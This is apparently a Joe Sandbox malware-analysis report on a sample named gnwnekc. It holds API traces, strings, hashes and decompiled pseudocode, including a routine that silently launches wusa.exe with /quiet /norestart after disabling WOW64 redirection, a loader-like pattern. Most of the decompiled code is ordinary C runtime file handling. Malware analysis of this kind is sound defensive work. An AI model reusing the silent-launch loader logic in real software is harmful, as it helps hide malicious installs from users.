IsWow64Process.KERNEL32(00000000,?), ref: 004010E4
CoInitialize.OLE32(00000000), ref: 00401145
GetTempPathW.KERNEL32(000000FF,?), ref: 00401155
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00401198
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004011B1
GetCommandLineW.KERNEL32 ref: 004011B7
CreateProcessW.KERNEL32 ref: 004011E5
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004011F5
GetExitCodeProcess.KERNEL32(?,?), ref: 00401204
CloseHandle.KERNEL32(?), ref: 00401214
CloseHandle.KERNEL32(?), ref: 0040121A
Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 00401220
ExitProcess.KERNEL32 ref: 0040122A

Strings

\wusa.exe, xrefs: 0040119E
48058040134, xrefs: 004010AC
/quiet, xrefs: 00401122
/norestart, xrefs: 00401110

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ProcessWow64$CloseCountExitHandleRedirectionTickWindow$AllocCodeCommandConsoleCreateCurrentDirectoryDisableInitializeLineObjectPathRevertShowSingleSleepSystemTempVirtualWait__fread_nolock
String ID: /norestart$/quiet$48058040134$\wusa.exe
API String ID: 3408057934-2213496630
Opcode ID: fe8768648f22f0692b8560295a669788271fdd24f63a1e0b440b0572beaa4f62
Instruction ID: cf8ef039ba5b91c9880f0a559042327410600f933109a145d64942cbda34b5a7
Opcode Fuzzy Hash: fe8768648f22f0692b8560295a669788271fdd24f63a1e0b440b0572beaa4f62
Instruction Fuzzy Hash: 21513B71904341ABC710AF21ED49A6BBBE8FFD4705F00853EF999A72A1E7349884C75A

Uniqueness

Uniqueness Score: -1.00%

Function 003C0F9C Relevance: 6.5, APIs: 4, Instructions: 481
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: b56f01204bdbf637c6c66e0f1a2b816192cc0f0a963c5938ca1b29c8ea03ebd3
Instruction ID: d6ac272c77da0ed41a9d2722e3a94f689e7ffa8a7dd30de1a0d3e2b0ffaa605e
Opcode Fuzzy Hash: b56f01204bdbf637c6c66e0f1a2b816192cc0f0a963c5938ca1b29c8ea03ebd3
Instruction Fuzzy Hash: 7D122B25D5C3D8ADDF12CBE89811BFCBFB09F16201F1440CAE598FA292D2764789DB25

Uniqueness

Uniqueness Score: -1.00%

Function 003C0EBF Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 003C0EDC

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
Instruction ID: f68c29eac1e9539b604cdcac21982ae1c238b3bf4e10d7b47247ec19e4698540
Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
Instruction Fuzzy Hash: C2F0A0B2E1414CEBDB1DEAF8894AFAEB7ACDB08200F20456DEA06D2640E53489808364

Uniqueness

Uniqueness Score: -1.00%

Function 0040183A Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040183A() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401961); // executed
				return _t1;
			}

0x0040183f
0x00401845

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040183F

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a9086a5e2b8492a59f9121e7be8c4b619666b8eb926bdb56d80bd50e92d5f58b
Instruction ID: 7824cb74a6a676970f91987c5f8456e4ba82a1ba175575055a5e16b8f8eb3917
Opcode Fuzzy Hash: a9086a5e2b8492a59f9121e7be8c4b619666b8eb926bdb56d80bd50e92d5f58b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00408C23 Relevance: 13.8, APIs: 9, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00408C23(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E00406609(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E004065F6( *_t137))) = 9;
						L60:
						_t139 = E00405C88();
						goto L61;
					}
					__eflags = _t198 -  *0x417358; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x417158 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E00406609(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
								E00405C88();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E004069B7(_t154);
								E00405BB5(0);
								E00405BB5(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00409BFF(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x417158 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x417158 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t57 = _t143 + 0x2a; // 0x10c483c2
										_t180 =  *((intOrPtr*)(_v20 + _t57));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t74 =  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t185 =  *((intOrPtr*)(_v20 + _t74));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t91 =  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t190 =  *((intOrPtr*)(_v20 + _t91));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x417158 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0040B0D2(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0040661C(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E004065F6(__eflags))) = 9;
											 *(E00406609(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x417158 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00409306();
												} else {
													_t170 = E00408FD3();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E0040904E(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x417158 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E004065F6(__eflags))) = 0xc;
									 *(E00406609(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00405BB5(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x417158 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00406609(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E00406609(_t246)) =  *_t197 & 0x00000000;
					_t139 = E004065F6(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00408c2c
0x00408c30
0x00408c33
0x00408c4d
0x00408c4f
0x00408fb4
0x00408fb4
0x00408fb9
0x00408fb9
0x00408fc1
0x00408fc7
0x00408fc7
0x00000000
0x00408fc7
0x00408c55
0x00408c5b
0x00000000
0x00000000
0x00408c65
0x00408c6b
0x00408c6e
0x00408c71
0x00408c7b
0x00408c7e
0x00408c81
0x00408c85
0x00408c87
0x00000000
0x00000000
0x00408c8d
0x00408c90
0x00408c96
0x00408cb0
0x00408cb2
0x00408fb0
0x00000000
0x00408fb0
0x00408cb8
0x00408cbb
0x00000000
0x00000000
0x00408cc1
0x00408cc5
0x00000000
0x00000000
0x00408ccb
0x00408cce
0x00408cd2
0x00408cd9
0x00408cdb
0x00408cdb
0x00408cde
0x00408d33
0x00408d35
0x00408cfb
0x00408d00
0x00408d07
0x00408d0d
0x00000000
0x00408d37
0x00408d39
0x00408d3a
0x00408d3c
0x00408d3f
0x00408d41
0x00408d43
0x00408d45
0x00408d45
0x00408d50
0x00408d52
0x00408d59
0x00408d5e
0x00408d61
0x00408d64
0x00408d66
0x00408d8a
0x00408d92
0x00408d95
0x00408d9c
0x00408da3
0x00408da7
0x00408da9
0x00408dac
0x00408db3
0x00408db3
0x00408db6
0x00408db8
0x00408dbb
0x00408dc0
0x00408dc3
0x00408dcc
0x00408dcc
0x00408dd0
0x00408dd3
0x00408dd5
0x00408ddb
0x00408ddd
0x00408de6
0x00408de7
0x00408de9
0x00408ded
0x00408dee
0x00408df2
0x00408df5
0x00408dff
0x00408e04
0x00408e07
0x00408e16
0x00408e16
0x00408e1a
0x00408e1d
0x00408e1f
0x00408e21
0x00408e23
0x00408e28
0x00408e2a
0x00408e2e
0x00408e2f
0x00408e35
0x00408e3f
0x00408e40
0x00408e43
0x00408e48
0x00408e4b
0x00408e5a
0x00408e5a
0x00408e5e
0x00408e61
0x00408e63
0x00408e65
0x00408e67
0x00408e69
0x00408e6f
0x00408e6f
0x00408e70
0x00408e7f
0x00408e82
0x00408e83
0x00408e83
0x00408e67
0x00408e63
0x00408e4b
0x00408e23
0x00408e1f
0x00408e07
0x00408ddd
0x00408dd5
0x00408e89
0x00408e8f
0x00408e91
0x00408f04
0x00408f04
0x00408f08
0x00408f18
0x00408f1e
0x00408f20
0x00408f7c
0x00408f7c
0x00408f84
0x00408f85
0x00408f87
0x00408fa0
0x00408fa3
0x00408ee0
0x00408ee1
0x00000000
0x00408ee6
0x00408fa9
0x00000000
0x00408fa9
0x00408f8e
0x00408f99
0x00000000
0x00408f99
0x00408f22
0x00408f25
0x00408f28
0x00000000
0x00000000
0x00408f2a
0x00408f2a
0x00408f2d
0x00408f30
0x00408f33
0x00408f3a
0x00408f3f
0x00408f41
0x00408f45
0x00408f60
0x00408f64
0x00408f65
0x00408f68
0x00408f69
0x00408f75
0x00408f6b
0x00408f6b
0x00408f6b
0x00408f47
0x00408f47
0x00408f47
0x00408f52
0x00408f57
0x00408f5a
0x00408f5a
0x00000000
0x00408f3f
0x00408e96
0x00408e99
0x00408ea0
0x00408ea5
0x00000000
0x00000000
0x00408eae
0x00408eb4
0x00408eb6
0x00000000
0x00000000
0x00408eb8
0x00408ebc
0x00000000
0x00000000
0x00408ed0
0x00408ed6
0x00408ed8
0x00408efc
0x00408eff
0x00000000
0x00408eff
0x00408eda
0x00000000
0x00408d68
0x00408d6d
0x00408d78
0x00408ee7
0x00408ee7
0x00408ee7
0x00408eea
0x00408eeb
0x00000000
0x00408ef3
0x00408d66
0x00408d35
0x00408ce0
0x00408ce3
0x00408cf7
0x00408cf9
0x00408d1a
0x00408d1d
0x00408d20
0x00408d23
0x00000000
0x00408d23
0x00000000
0x00408ce5
0x00408ce5
0x00408ce8
0x00408ceb
0x00000000
0x00408ceb
0x00408ce3
0x00408c98
0x00408c9d
0x00408ca5
0x00000000
0x00408c35
0x00408c3a
0x00408c3d
0x00408c42
0x00408fcc
0x00000000
0x00408fcc

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7962fd873c812c42c883a21e43ce0c8562e71b57de632454e07f1051821707c
Instruction ID: f4fb29cc2bc759040289b09a43810d9a49ae99a5ecc633e1fd25063e55365582
Opcode Fuzzy Hash: e7962fd873c812c42c883a21e43ce0c8562e71b57de632454e07f1051821707c
Instruction Fuzzy Hash: D0C12770904245AFDF15DFA9CA80BAE7BB1AF49304F04417EE945B73D2CB789901CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB9D Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E0040BB9D(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E0040C01D(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E004081AB(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E0040BF88(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E0040834F(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x417158 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E0040C241(_t189, 0);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0x417158 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x417158 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E0040BF88();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x417158 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E0040661C(GetLastError());
											 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E004082BE( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0040C197(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0040CCBB(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E0040661C(_t271);
							 *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x417158 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E004065F6(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x417158 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E0040661C(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E0040BF88();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00406609(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E004065F6(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E00406609(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E004065F6(_t289)));
				}
			}

0x0040bbc0
0x0040bbc4
0x0040bbc5
0x0040bbc5
0x0040bbc5
0x0040bbc7
0x0040bbca
0x0040bbcd
0x0040bbe8
0x0040bbed
0x0040bbf0
0x0040bbf2
0x0040bbf4
0x0040bc13
0x0040bc1a
0x0040bc21
0x0040bc24
0x0040bc30
0x0040bc33
0x0040bc3b
0x0040bc3c
0x0040bc3f
0x0040bc3f
0x0040bc41
0x0040bc46
0x0040bc48
0x0040bc4b
0x0040bc53
0x0040bc56
0x0040bcc3
0x0040bcc4
0x0040bcca
0x0040bccc
0x0040bd15
0x0040bd18
0x0040bd21
0x0040bd24
0x0040bd27
0x0040bd29
0x0040bd29
0x0040bd29
0x0040bd1a
0x0040bd1d
0x0040bd1d
0x0040bd2e
0x0040bd31
0x0040bd3d
0x0040bd42
0x0040bd4e
0x0040bd58
0x0040bd5c
0x0040bd66
0x0040bd69
0x0040bd74
0x0040bd79
0x0040bd98
0x0040bd9b
0x0040bd9f
0x0040bda0
0x0040bda6
0x0040bdab
0x0040bdae
0x0040bdb0
0x0040bdb2
0x0040bdb7
0x0040bdb9
0x0040bdbb
0x0040bdbe
0x0040bdc0
0x0040bdda
0x0040bdfe
0x0040be02
0x0040be06
0x0040be08
0x0040be0c
0x0040be0e
0x0040be18
0x0040be1b
0x0040be22
0x0040be22
0x0040be22
0x0040be22
0x0040be0c
0x0040be27
0x0040be33
0x0040be35
0x0040bec0
0x0040bec0
0x00000000
0x0040be3b
0x0040be3b
0x0040be3f
0x00000000
0x00000000
0x0040be44
0x0040be56
0x0040be5e
0x0040be61
0x0040be62
0x0040be65
0x0040be6c
0x0040be71
0x0040be74
0x0040bea8
0x0040beb2
0x0040beb2
0x0040bebc
0x00000000
0x0040bebc
0x0040be7d
0x0040be96
0x0040be9d
0x0040bcbd
0x00000000
0x0040bcbd
0x0040be35
0x0040bdc2
0x00000000
0x0040bd7b
0x0040bd82
0x0040bd85
0x0040bd87
0x00000000
0x00000000
0x0040bd89
0x0040bd8b
0x0040bd8b
0x00000000
0x0040bd91
0x0040bd79
0x0040bcd4
0x0040bcd7
0x0040bcf2
0x0040bcf7
0x0040bcfd
0x0040bcff
0x0040bd0a
0x0040bd0a
0x00000000
0x0040bcff
0x0040bc58
0x0040bc5f
0x0040bc61
0x0040bc98
0x0040bc98
0x0040bca2
0x0040bca5
0x0040bcac
0x0040bcac
0x0040bcac
0x0040bcb8
0x00000000
0x0040bcb8
0x0040bc63
0x0040bc67
0x00000000
0x00000000
0x0040bc69
0x0040bc78
0x0040bc7d
0x0040bc80
0x0040bc81
0x0040bc84
0x0040bc84
0x0040bc8b
0x0040bc8d
0x0040bc90
0x0040bc93
0x0040bc96
0x00000000
0x00000000
0x00000000
